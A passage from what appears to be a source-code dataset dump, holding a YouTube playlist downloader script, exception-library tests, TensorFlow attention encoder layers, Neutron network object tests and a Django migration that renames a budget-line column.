hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794d8b5ba2a66727da52af091bb2853a1eb0adfc
| 13,483
|
py
|
Python
|
__main__.py
|
Lukasdotcom/youtubeMusic
|
96a669e9e1c74d7c5a8351cea4043866fad6b8fa
|
[
"MIT"
] | null | null | null |
__main__.py
|
Lukasdotcom/youtubeMusic
|
96a669e9e1c74d7c5a8351cea4043866fad6b8fa
|
[
"MIT"
] | 2
|
2021-05-27T12:14:29.000Z
|
2021-08-06T14:02:40.000Z
|
__main__.py
|
Lukasdotcom/youtubeMusic
|
96a669e9e1c74d7c5a8351cea4043866fad6b8fa
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
from pytube import YouTube, Playlist
import sys
import os
import json
import glob
import vlc
import random
import time
from mutagen.mp4 import MP4
print("youtubeMusic downloader is starting! This program can be used to download your music playlist from youtube for free in a fast and easy way!")
print("If this program is not working for you please put a issue on github. Many issues exist because of the library that this was built on so they may not be fixable temporarily.")
def writeFile(location, info): # Will write info in json format to a file
with open(location, 'w') as f:
json.dump(info, f)
def readFile(location): # Loads the location of a certain file and returns that file if it is json
with open(location, "r") as f:
try:
return json.load(f)
except:
raise Exception(
f"Json file at {location} has corrupted or invalid entries")
print("Searching for configuration files")
try: # Will check for the arguments for the location of the config
location = sys.argv[1]
configLocation = location + ".config.json"
cacheLocation = location + ".cache.json"
except IndexError:
# Will find where the programs directory is.
print("argument missing for directory using directory of program")
location = sys.path[0].replace("__main__.py", "")
for x in range(len(location)):
if location[x] == "/":
character = "/"
break
elif location[x] == "\\":
character = "\\"
break
if location[-1] != character:
location = f"{location}{character}"
configLocation = location + ".config.json"
cacheLocation = location + ".cache.json"
if not os.path.isdir(location): # Will check if the folder for the config exists
os.makedirs(location)
print("Folder did not exist created new folder at " + location)
writeFile(configLocation + "temp", {})
os.remove(configLocation + "temp")
# Will find the config file and create a new one if it does not exist
print(f"Config stored in {location}")
if not os.path.isfile(configLocation):
print("New folder detected creating new config")
writeFile(configLocation, {})
configInfo = {}
else:
configInfo = readFile(configLocation)
print("Found Configuration files")
if not os.path.isfile(cacheLocation):
print("New folder detected creating new cache")
writeFile(cacheLocation, {})
else:
print("Found cache files")
def update(configInfo): # updates all playlists
global cacheLocation
cacheInfo = readFile(cacheLocation)
number = 1
configLen = len(configInfo)
for x in configInfo:
try: # will check if the playlist is valid
playlist = Playlist(x)
print(
f"Starting update of playlist {number} of {configLen} called {playlist.title} at location {configInfo[x]}")
except:
print(
f"Skipping update of playlist {number} of {configLen} because of invalid link")
number += 1
break
# Will check if the folder for the config exists
if not os.path.isdir(configInfo[x]):
os.makedirs(configInfo[x])
print(
f"Folder for {playlist.title} not exist created new folder at {configInfo[x]}")
howFarVideo = 0 # Used to see how many videos the program is through
videoLen = len(playlist.videos) # how many videos are in the playlist
songList = glob.glob(configInfo[x] + "*.mp3") # a list of all songs already downloaded to make sure there are not extra songs that need to be deleted
# goes through every video in the playlist
for y in playlist.videos:
try: # looks if the metadata is cached
metadata = cacheInfo[y.watch_url]
skip = True
except:
try: # looks if the metadata characteristic exists for a video
metadata = y.metadata.metadata[0]
except:
metadata = {}
skip = False # used to check if the cache needs to be updated
try: # checks the title otherwise uses the title of the video
videoTitle = metadata["Song"]
except:
try:
videoTitle = y.title
skip = False
except:
print("cant find video title skipping")
continue
print(f"Song title not found resorting to video title of {videoTitle}")
bannedCharacters = [".", "'", '"', ",", "/", "\\", "?"] # invalid characters for file names
videoTitle2 = ""
for z in videoTitle: # removes banned characters from a video
if z not in bannedCharacters:
videoTitle2 += z
videoTitle = videoTitle2
try: # Checks for the artist otherwise uses the name of the channel
videoAuthor = metadata["Artist"]
except:
videoAuthor = y.author
if videoAuthor[-7:] == "- Topic": # Channels for some reason have - Topic at the end so that is removed
videoAuthor = videoAuthor[:-8]
skip = False
print(f"Song artist not found using video channel name {videoAuthor}")
videoAuthor2 = ""
for z in videoAuthor: # removes banned characters from a video
if z not in bannedCharacters:
videoAuthor2 += z
videoAuthor = videoAuthor2
try: # Checks if an album is in the metadata
videoAlbum = metadata["Album"]
except:
skip = False
videoAlbum = "unknown"
print(f"Song album not found")
howFarVideo += 1
# prints a status update
print(
f"Playlist {number} of {configLen}; Video {howFarVideo} of {videoLen} called {videoTitle}; ")
name = configInfo[x] + videoTitle + ".mp3"
if (configInfo[x] + videoTitle + ".mp3") in songList: # checks if the song was already downloaded
songList.remove(configInfo[x] + videoTitle + ".mp3") # removes the song from the deletion queue
print("Already downloaded skipped")
else:
print("Downloading")
try:
# code used to download the song and store it in the right folder with the correct file name
y.streams.filter(file_extension='mp4').filter(
only_audio=True).first().download(output_path=configInfo[x], filename=name)
skip = False
except Exception:
# used for a failure in a download to delete the file also and report it to the user.
print("ERROR while downloading skipping")
try:
os.remove(name)
except Exception:
1
if not skip: # if the cache for the video needs to be updated it is updated here
# makes the file have the correct metadata
file = MP4(name)
file['title'] = videoTitle
file['author'] = videoAuthor
file['album'] = videoAlbum
file.save()
os.rename(name ,configInfo[x] + videoTitle + ".mp3")
cacheInfo[y.watch_url] = {"Song": videoTitle, "Artist": videoAuthor, "Album": videoAlbum}
writeFile(cacheLocation, cacheInfo)
# goes through every video still left in the deletion queue
songLen = len(songList)
howFarVideo = 0
for y in songList:
howFarVideo += 1
os.remove(y)
print(
f"Playlist {number} of {configLen}; Deleting video {howFarVideo} of {songLen} located at {y}")
number += 1
# updates the cache
writeFile(cacheLocation, cacheInfo)
return configInfo
def clearCache(configInfo): # Clears the cache
global cacheLocation
print("Deleting cache")
try:
os.remove(cacheLocation)
except Exception:
print("Cache not found")
return configInfo
def show(configInfo): # print all playlists
print("List of all playlists")
howMany = 0
for x in configInfo:
howMany += 1
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"{howMany}. Link: {x}")
print(f"{howMany}. Name: {playlist}")
print(f"{howMany}. Storage: {configInfo[x]}")
print("")
input("Press enter to continue")
return configInfo
def edit(configInfo): # edit one of them
choice = input("Enter the howmanyth entry you want to change: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
if input("Enter y to confirm this entry: ") == "y":
print("If you enter nothing for the following the entry will not change")
url = input("Enter the url of the playlist: ")
if url == "":
url = x
location = input(
"Enter the storage location of the playlist; complete path with the / or \\ at the end: ")
if location == "":
location = configInfo[x]
configInfo.pop(x)
configInfo[url] = location
else:
input("Invalid input press enter to continue")
return configInfo
def delete(configInfo):
choice = input("Enter the howmanyth entry you want to delete: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
if input("Enter y to confirm deletion: ") == "y":
configInfo.pop(x)
else:
input("Invalid input press enter to continue")
return configInfo
def add(configInfo):
url = input("Enter the url of the playlist: ")
location = input(
"Enter the storage location of the playlist; complete path with the / or \\ at the end: ")
configInfo[url] = location
return configInfo
def leave(configInfo):
global configLocation
writeFile(configLocation, configInfo)
print("Left program succesfully")
exit()
def playSong(song):
song.play()
def play(configInfo): # Used to play a playlist
choice = input("Enter the howmanyth entry you want to play: ")
try:
choice = int(choice)
except ValueError:
choice = 0
if choice > 0 and choice <= len(configInfo):
for x in configInfo:
choice -= 1
if choice < 1:
break
try:
playlist = Playlist(x).title
except Exception:
playlist = "invalid link"
print(f"Link: {x}")
print(f"Name: {playlist}")
print(f"Storage: {configInfo[x]}")
songs = glob.glob(configInfo[x] + "*.mp3")
try:
while True:
name = random.choice(songs)
song = vlc.MediaPlayer(name)
song.play()
print(f"Playing: {name}")
time.sleep(1)
while song.is_playing():
time.sleep(1)
except KeyboardInterrupt:
song.stop()
return configInfo
# list of all functions
options = {
"u": update,
"p": show,
"e": edit,
"d": delete,
"a": add,
"c": clearCache,
"q": leave,
"r": play
}
for x in sys.argv[2:]: # runs every choice put after the location automatically.
try: # Runs the correct function for which one
test = options[x]
skip = False
except KeyError:
print("Invalid Input")
skip = True
if not skip:
configInfo = options[x](configInfo)
writeFile(configLocation, configInfo)
while True:
# Will give the choices to the user
choice = input("""
--help menu--
The following are the options
u - will update all playlists
p - will print all playlist links and where they are stored
e - edit a playlist entry
d - delete a playlist entry(Will not delete the actual music files)
a - can be used to add another playlist
c - clear cache used when downloading is not working well
r - used to play a playlist and press ctrl-c to stop playing
q - used to quit
""")
try: # Runs the correct function for which one
test = options[choice]
skip = False
except KeyError:
print("Invalid Input")
skip = True
if not skip:
configInfo = options[choice](configInfo)
writeFile(configLocation, configInfo)
| 37.041209
| 181
| 0.579174
|
794d8b7e819dc62853bd14aa423695613c6d139b
| 5,153
|
py
|
Python
|
tests/prettyexc_test.py
|
youknowone/prettyexc
|
03894a86c72d3196c3326a5a8bce2a961c87f60d
|
[
"BSD-2-Clause-FreeBSD"
] | 6
|
2015-10-28T13:40:50.000Z
|
2020-03-24T06:05:30.000Z
|
tests/prettyexc_test.py
|
youknowone/prettyexc
|
03894a86c72d3196c3326a5a8bce2a961c87f60d
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
tests/prettyexc_test.py
|
youknowone/prettyexc
|
03894a86c72d3196c3326a5a8bce2a961c87f60d
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2015-08-31T16:32:00.000Z
|
2017-05-31T08:32:42.000Z
|
from prettyexc import PrettyException, Environment
from prettyexc import patch
from prettyexc.environment import default_python_environment, human_environment
from prettyexc.exceptions import InvalidArgumentCount, InvalidArgumentKeyword
def test_default():
e = PrettyException()
assert(e)
assert(str(e) == '')
assert(repr(e) == '<prettyexc.core.PrettyException>')
assert(e._show_module() is True)
assert(e._type(e.repr_environment) == 'prettyexc.core.PrettyException')
assert(not e._message(e.unicode_environment))
assert(str([e]) == '[<prettyexc.core.PrettyException>]')
e = PrettyException(200)
assert(str(e) == '200')
assert(str([e]) == '[<prettyexc.core.PrettyException(200)>]')
e = PrettyException("test")
assert(str(e) == 'test')
assert(str([e]) == '[<prettyexc.core.PrettyException("test")>]')
e = PrettyException(code=10)
assert(str(e) == "code=10")
assert(str([e]) == '[<prettyexc.core.PrettyException(code=10)>]')
e = PrettyException(mode='test')
assert(str(e) == 'mode="test"')
assert(str([e]) == '[<prettyexc.core.PrettyException(mode="test")>]')
def test_pythonlike():
p = Exception()
e = PrettyException()
assert(str(e) == str(p))
p = Exception('message')
e = PrettyException('message')
assert(str(e) == str(p))
p = Exception('many', 'args')
e = PrettyException('many', 'args')
# assert(str(e) == str(p), str(e), str(p))
def test_pythondefault():
class PythonException(PrettyException):
unicode_environment = default_python_environment
repr_environment = default_python_environment
e = PythonException()
assert(e)
assert(str(e) == 'PythonException')
assert(str([e]) == '[PythonException]')
def test_format():
class T1Exception(PrettyException):
message_format = u'Raise {code} with {description}.'
e = T1Exception(code=200, description='OK')
assert(e)
assert(e.message == 'Raise 200 with OK.')
assert(str(e) == 'Raise 200 with OK.')
assert(repr(e) == '<{0}.T1Exception(code=200,description="OK")>'.format(__name__))
def test_arguments():
class ArgsException(PrettyException):
pass
e = ArgsException('Message', code=200, description='OK')
assert(e)
assert(len(e.args) == 1)
assert(e.args[0] == 'Message')
assert(e[0] == 'Message')
assert(len(e.kwargs) == 2)
assert(e.kwargs['code'] == 200)
assert(e.kwargs['description'] == 'OK')
assert(e['code'] == 200)
assert(e['description'] == 'OK')
assert(str(e) == '"Message",code=200,description="OK"')
assert(repr(e) == '<{0}.ArgsException("Message",code=200,description="OK")>'.format(__name__))
def test_message():
class T2Exception(PrettyException):
message = u'You should see this message'
e = T2Exception()
assert(e)
assert(str(e) == 'You should see this message')
assert(repr(e) == '<{0}.T2Exception>'.format(__name__))
def test_human():
class T3Exception(PrettyException):
unicode_environment = human_environment
message = u'Shows message.'
e = T3Exception()
assert(str(e) == 'T3Exception: Shows message.')
def test_env():
custom_env = Environment(SHOW_MODULE=True, SHOW_ARGS=False)
class T4Exception(PrettyException):
unicode_environment = custom_env
e = T4Exception(1, 2, 3, 'arg4')
assert(str(e) == '{0}.T4Exception'.format(__name__))
def test_patch():
class AnException(Exception):
def __init__(self, *args):
super(AnException, self).__init__(*args)
self.number = 10
def value(self):
return self.number + 2
patch(AnException, PrettyException)
e = AnException("message", user_id=1)
assert(str(e) == '"message",user_id=1')
assert(repr(e) == '<{0}.AnException("message",user_id=1)>'.format(__name__))
assert(e.value() == 12)
e = PrettyException()
assert(str(e) == '')
def test_transition():
class TransitionException(PrettyException):
_args_kwargs_map = ['code', 'description']
e = TransitionException(200, 'OK')
assert(str(e) == 'code=200,description="OK"')
def test_constraint():
class MinArgsException(PrettyException):
_req_args_count = 2
try:
e = MinArgsException(0)
except InvalidArgumentCount as e:
assert e.expected == 2
assert e.given == 1
e = MinArgsException(0, 1)
e = MinArgsException(0, 1, 2)
class MinKwargsException(PrettyException):
_req_kwargs_keys = ['code', 'desc']
try:
e = MinKwargsException(code=200)
except InvalidArgumentKeyword as e:
assert e.expected == 'desc'
e = MinKwargsException(code=200, desc='blah')
e = MinKwargsException(200, 'blah')
assert e.code == 200
assert e.desc == 'blah'
def test_get_with_index():
class TestException(PrettyException):
pass
e = TestException(1, 2)
assert e[0] == 1
assert e[1] == 2
if __name__ == '__main__':
symbols = list(globals().keys())
for k in symbols:
if k.startswith('test_'):
globals()[k]()
| 28.469613
| 98
| 0.63594
|
794d8cc7adc1a5e8c894742b28819d6fa4a6298f
| 5,784
|
py
|
Python
|
eoflow/models/pse_tae_layers.py
|
JDESLOIRES/eo-flow
|
def495e9292809656b906cfd6b8e7389ff9cea61
|
[
"MIT"
] | 80
|
2019-09-11T08:53:03.000Z
|
2022-03-29T05:32:02.000Z
|
eoflow/models/pse_tae_layers.py
|
JDESLOIRES/eo-flow
|
def495e9292809656b906cfd6b8e7389ff9cea61
|
[
"MIT"
] | 12
|
2019-10-11T11:00:56.000Z
|
2022-01-31T10:43:40.000Z
|
eoflow/models/pse_tae_layers.py
|
JDESLOIRES/eo-flow
|
def495e9292809656b906cfd6b8e7389ff9cea61
|
[
"MIT"
] | 21
|
2019-09-11T08:12:57.000Z
|
2022-03-07T01:05:05.000Z
|
import numpy as np
import tensorflow as tf
import tensorflow.keras.layers as L
from .transformer_encoder_layers import scaled_dot_product_attention, positional_encoding
pooling_methods = {
'mean': tf.math.reduce_mean,
'std': tf.math.reduce_std,
'max': tf.math.reduce_max,
'min': tf.math.reduce_min
}
class PixelSetEncoder(tf.keras.layers.Layer):
def __init__(self, mlp1=[10, 32, 64], mlp2=[64, 128], pooling='mean_std'):
super().__init__()
self.mlp1 = tf.keras.Sequential([LinearLayer(out_dim) for out_dim in mlp1])
pooling_methods = [SetPooling(method) for method in pooling.split('_')]
self.pooling = SummaryConcatenate(pooling_methods, axis=-1)
mlp2_layers = [LinearLayer(out_dim) for out_dim in mlp2[:-1]]
mlp2_layers.append(LinearLayer(mlp2[-1], activation=False))
self.mlp2 = tf.keras.Sequential(mlp2_layers)
self.encoder = tf.keras.Sequential([
self.mlp1,
self.pooling,
self.mlp2
])
def call(self, x, training=None, mask=None):
return self.encoder(x, training=training, mask=mask)
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, n_head, d_k, name='multi_head_attention'):
super().__init__(name=name)
self.n_head = n_head
self.d_k = d_k
self.fc1_q = L.Dense(d_k * n_head,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=np.sqrt(2.0 / d_k)))
self.fc1_k = L.Dense(d_k * n_head,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=np.sqrt(2.0 / d_k)))
self.fc2 = tf.keras.Sequential([
L.BatchNormalization(),
L.Dense(d_k)
])
def split_heads(self, x, batch_size):
"""Split the last dimension into (n_head, d_k).
Transpose the result such that the shape is (batch_size, n_head, seq_len, d_k)
"""
x = tf.reshape(x, (batch_size, -1, self.n_head, self.d_k))
return tf.transpose(x, perm=[0, 2, 1, 3])
def call(self, q, k, v, training=None, mask=None):
batch_size = tf.shape(q)[0]
q = self.fc1_q(q)
q = self.split_heads(q, batch_size)
q = tf.reduce_mean(q, axis=2, keepdims=True) # MEAN query
k = self.fc1_k(k)
k = self.split_heads(k, batch_size)
# Repeat n_head times
v = tf.expand_dims(v, axis=1)
v = tf.tile(v, (1, self.n_head, 1, 1))
output, attn = scaled_dot_product_attention(q, k, v, mask)
output = tf.squeeze(output, axis=2)
# Concat heads
output = tf.reshape(output, (batch_size, -1))
return output
class TemporalAttentionEncoder(tf.keras.layers.Layer):
def __init__(self, n_head=4, d_k=32, d_model=None, n_neurons=[512, 128, 128], dropout=0.2,
T=1000, len_max_seq=24, positions=None):
super().__init__()
self.positions = positions
if self.positions is None:
self.positions = len_max_seq + 1
self.d_model = d_model
self.T = T
self.in_layer_norm = tf.keras.layers.LayerNormalization(name='in_layer_norm')
self.inconv = None
if d_model is not None:
self.inconv = tf.keras.Sequential([
L.Conv1D(d_model, 1, name='inconv'),
L.LayerNormalization(name='conv_layer_norm')
])
self.out_layer_norm = tf.keras.layers.LayerNormalization(name='out_layer_norm')
self.attention_heads = MultiHeadAttention(n_head, d_k, name='attention_heads')
mlp_layers = [LinearLayer(out_dim) for out_dim in n_neurons]
self.mlp = tf.keras.Sequential(mlp_layers, name='mlp')
self.dropout = L.Dropout(dropout)
def build(self, input_shape):
d_in = input_shape[-1] if self.d_model is None else self.d_model
self.position_enc = positional_encoding(self.positions, d_in, T=self.T)
def call(self, x, training=None, mask=None):
seq_len = tf.shape(x)[1]
x = self.in_layer_norm(x, training=training)
if self.inconv is not None:
x = self.inconv(x, training=training)
pos_encoding = self.position_enc[:, :seq_len, :]
if self.positions is None:
pos_encoding = self.position_enc[:, 1:seq_len+1, :]
enc_output = x + pos_encoding
enc_output = self.attention_heads(enc_output, enc_output, enc_output, training=training, mask=mask)
enc_output = self.mlp(enc_output, training=training)
enc_output = self.dropout(enc_output, training=training)
enc_output = self.out_layer_norm(enc_output, training=training)
return enc_output
def LinearLayer(out_dim, batch_norm=True, activation=True):
""" Linear layer. """
layers = [L.Dense(out_dim)]
if batch_norm:
layers.append(L.BatchNormalization())
if activation:
layers.append(L.ReLU())
return tf.keras.Sequential(layers)
class SetPooling(tf.keras.layers.Layer):
""" Pooling over the Set dimension using a specified pooling method. """
def __init__(self, pooling_method):
super().__init__()
self.pooling_method = pooling_methods[pooling_method]
def call(self, x, training=None, mask=None):
return self.pooling_method(x, axis=1)
class SummaryConcatenate(tf.keras.layers.Layer):
""" Runs multiple summary layers on a single input and concatenates them. """
def __init__(self, layers, axis=-1):
super().__init__()
self.layers = layers
self.axis = axis
def call(self, x, training=None, mask=None):
layer_outputs = [layer(x, training=training, mask=mask) for layer in self.layers]
return L.concatenate(layer_outputs, axis=self.axis)
| 32.677966
| 107
| 0.640387
|
794d8d023fc10b58c8d4cd639d5c7a5ea95f20c2
| 7,486
|
py
|
Python
|
neutron/tests/unit/objects/test_network.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_network.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_network.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.objects import base as obj_base
from neutron.objects import network
from neutron.objects.qos import policy
from neutron.tests.unit.objects import test_base as obj_test_base
from neutron.tests.unit import testlib_api
class NetworkPortSecurityIfaceObjTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkPortSecurity
class NetworkPortSecurityDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkPortSecurity
def setUp(self):
super(NetworkPortSecurityDbObjTestCase, self).setUp()
self.update_obj_fields({'id': lambda: self._create_test_network_id()})
class NetworkSegmentIfaceObjTestCase(obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkSegment
def setUp(self):
super(NetworkSegmentIfaceObjTestCase, self).setUp()
# TODO(ihrachys): we should not need to duplicate that in every single
# place, instead we should move the default pager into the base class
# attribute and pull it from there for testing matters. Leaving it for
# a follow up.
self.pager_map[self._test_class.obj_name()] = (
obj_base.Pager(
sorts=[('network_id', True), ('segment_index', True)]))
class NetworkSegmentDbObjTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkSegment
def setUp(self):
super(NetworkSegmentDbObjTestCase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
def test_hosts(self):
hosts = ['host1', 'host2']
obj = self._make_object(self.obj_fields[0])
obj.hosts = hosts
obj.create()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertEqual(hosts, obj.hosts)
obj.hosts = ['host3']
obj.update()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertEqual(['host3'], obj.hosts)
obj.hosts = None
obj.update()
obj = network.NetworkSegment.get_object(self.context, id=obj.id)
self.assertFalse(obj.hosts)
class NetworkObjectIfaceTestCase(obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.Network
def setUp(self):
super(NetworkObjectIfaceTestCase, self).setUp()
self.pager_map[network.NetworkSegment.obj_name()] = (
obj_base.Pager(
sorts=[('network_id', True), ('segment_index', True)]))
class NetworkDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.Network
@mock.patch.object(policy.QosPolicy, 'unset_default')
def test_qos_policy_id(self, *mocks):
policy_obj = policy.QosPolicy(self.context)
policy_obj.create()
obj = self._make_object(self.obj_fields[0])
obj.qos_policy_id = policy_obj.id
obj.create()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj.id, obj.qos_policy_id)
policy_obj2 = policy.QosPolicy(self.context)
policy_obj2.create()
obj.qos_policy_id = policy_obj2.id
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj2.id, obj.qos_policy_id)
obj.qos_policy_id = None
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertIsNone(obj.qos_policy_id)
@mock.patch.object(policy.QosPolicy, 'unset_default')
def test__attach_qos_policy(self, *mocks):
obj = self._make_object(self.obj_fields[0])
obj.create()
policy_obj = policy.QosPolicy(self.context)
policy_obj.create()
obj._attach_qos_policy(policy_obj.id)
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj.id, obj.qos_policy_id)
policy_obj2 = policy.QosPolicy(self.context)
policy_obj2.create()
obj._attach_qos_policy(policy_obj2.id)
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual(policy_obj2.id, obj.qos_policy_id)
def test_dns_domain(self):
obj = self._make_object(self.obj_fields[0])
obj.dns_domain = 'foo.com'
obj.create()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('foo.com', obj.dns_domain)
obj.dns_domain = 'bar.com'
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('bar.com', obj.dns_domain)
obj.dns_domain = None
obj.update()
obj = network.Network.get_object(self.context, id=obj.id)
self.assertIsNone(obj.dns_domain)
def test__set_dns_domain(self):
obj = self._make_object(self.obj_fields[0])
obj.create()
obj._set_dns_domain('foo.com')
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('foo.com', obj.dns_domain)
obj._set_dns_domain('bar.com')
obj = network.Network.get_object(self.context, id=obj.id)
self.assertEqual('bar.com', obj.dns_domain)
class SegmentHostMappingIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.SegmentHostMapping
class SegmentHostMappingDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.SegmentHostMapping
def setUp(self):
super(SegmentHostMappingDbObjectTestCase, self).setUp()
self.update_obj_fields(
{'segment_id': lambda: self._create_test_segment_id()})
class NetworkDNSDomainIfaceObjectTestcase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.NetworkDNSDomain
class NetworkDNSDomainDbObjectTestcase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.NetworkDNSDomain
def setUp(self):
super(NetworkDNSDomainDbObjectTestcase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
class ExternalNetworkIfaceObjectTestCase(
obj_test_base.BaseObjectIfaceTestCase):
_test_class = network.ExternalNetwork
class ExternalNetworkDbObjectTestCase(obj_test_base.BaseDbObjectTestCase,
testlib_api.SqlTestCase):
_test_class = network.ExternalNetwork
def setUp(self):
super(ExternalNetworkDbObjectTestCase, self).setUp()
self.update_obj_fields(
{'network_id': lambda: self._create_test_network_id()})
| 33.271111
| 78
| 0.682474
|
794d8db77bc38258c667143acbc2d428d5e2223e
| 16,109
|
py
|
Python
|
truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 9
|
2016-09-14T02:19:19.000Z
|
2020-10-18T14:52:14.000Z
|
truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 19
|
2016-11-09T21:28:51.000Z
|
2021-02-10T22:37:31.000Z
|
truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py
|
JonathanCollaud/truffe2
|
5cbb055ac1acf7e7dc697340618fcb56c67fbd91
|
[
"BSD-2-Clause"
] | 13
|
2016-12-31T14:22:09.000Z
|
2020-12-27T19:43:19.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Renaming field 'ExpenseClaim.account_id'
db.rename_column(u'accounting_main_budgetline', 'compte_id', 'account_id')
def backwards(self, orm):
# Renaming field 'ExpenseClaim.compte_id'
db.rename_column(u'accounting_main_budgetline', 'account_id', 'compte_id')
models = {
u'accounting_core.account': {
'Meta': {'unique_together': "(('name', 'accounting_year'), ('account_number', 'accounting_year'))", 'object_name': 'Account'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountCategory']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'visibility': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'accounting_core.accountcategory': {
'Meta': {'unique_together': "(('name', 'accounting_year'),)", 'object_name': 'AccountCategory'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
